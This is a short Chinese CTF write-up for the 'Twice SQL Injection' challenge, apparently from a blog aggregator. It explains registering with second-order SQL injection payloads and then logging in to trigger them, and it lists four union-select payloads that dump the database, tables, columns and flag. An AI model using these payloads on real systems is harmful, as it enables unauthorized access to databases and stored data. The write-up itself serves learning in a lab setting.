当前位置: 首页 > news >正文

[October 2019]Twice SQL Injection

news 2025/7/4 3:58:40

有一个登录框和一个注册页面,题目也说这个是二次注入,那么就用二次注入的payload就行

1' union select database()# //爆库
1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#   //爆表
1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#  //爆字段
1' union select flag from flag# //爆数据

先注册

再登录

这里就可以看到数据库被爆出来了,其他也是一样的,直到找出最终的flag

http://www.lryc.cn/news/496432.html

相关文章:

  • Python爬虫——城市数据分析与市场潜能计算(Pandas库)
  • 如何搭建JMeter分布式集群环境来进行性能测试
  • 【Halcon】 derivate_gauss
  • stm32中systick时钟pinlv和系统节拍频率有什么区别,二者有无影响?
  • 柔性数组详解+代码展示
  • 前端入门指南:Webpack插件机制详解及应用实例
  • C++备忘录模式
  • 【Electron学习笔记(四)】进程通信(IPC)
  • Java 中的 remove 方法深度解析
  • 企业品牌曝光的新策略:短视频矩阵系统
  • 【初阶数据结构与算法】二叉树顺序结构---堆的应用之堆排、Top-K问题
  • vue3 + ts 使用 el-tree
  • Create Stunning Word Clouds with Ease!
  • html+css网页设计 旅游 马林旅行社5个页面
  • python selenium(4+)+chromedriver最新版 定位爬取嵌套shadow-root(open)中内容
  • React基础教程(11):useCallback记忆函数的使用
  • arp-scan 移植到嵌入式 Linux 系统是一个涉及多个步骤的过程
  • 【Linux】常用命令一
  • 在鲲鹏麒麟服务器上部署MySQL主从集群
  • Siknhorn算法介绍
  • 群控系统服务端开发模式-应用开发-邮箱短信通道功能开发
  • [docker中首次配置git环境]
  • 书生浦语·第四期作业合集
  • 5G学习笔记之PRACH
  • Ubuntu24.04配置DINO-Tracker
  • 抓包之查看websocket内容
  • 【Leetcode Top 100】21. 合并两个有序链表
  • 账本模型
  • openwrt利用nftables在校园网环境下开启nat6 (ipv6 nat)
  • 24.12.02 Element